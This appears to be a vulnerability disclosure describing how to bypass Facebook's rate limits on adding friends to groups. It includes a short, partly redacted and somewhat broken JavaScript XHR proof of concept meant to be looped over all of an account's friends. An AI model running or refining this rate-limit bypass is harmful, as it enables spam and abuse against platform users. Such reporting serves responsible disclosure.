Title
Bypass Facebook Protection/Block System
Description and Impact
As you know facebook protection system build to stop spammers and scammers ... etc
Examples :
for groups there is a limit on adding friends to groups user will be blocked if he added (600 - 1200) of his friends using script or tool .
also for sharing to groups , i think maximum shares to groups = 7 , after that the user will be blocked from sharing to groups .
anyway and after making research i found that the domain *.facebook.com have no validation controls, or facebook system is not figured correctly to work on .
Reproduction Instructions / Proof of Concept
for example on bypassing limit for adding friends to single group :
- create XHR request to add users by using the following url :
*/groups/members/add/?purposes [hidden for security purposes]
code :
var uid="778218884"; // loop for all friends
var Page=new XMLHttpRequest();
var PageURL="*a/groups/members/add/?purposes"; [hidden for security purposes]
var PageParams="fb_dtsg=AQHR-09syXqn&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&addees%5B"+uid+"%5D="+uid+"&group_id=824691297597477";
Page.open("POST",PageURL,true);
Page.onreadystatechange=function(){
if(Page.readyState==4&&Page.status==200){
Page.close}
}
Page.send(PageParams);
}
the previous code could be run to add 8 friends or more per request . for fast adding .
POC
Account A : used normal adding method .
Account B : Used bypass exploit . [minute : 2:58 exploit executed]
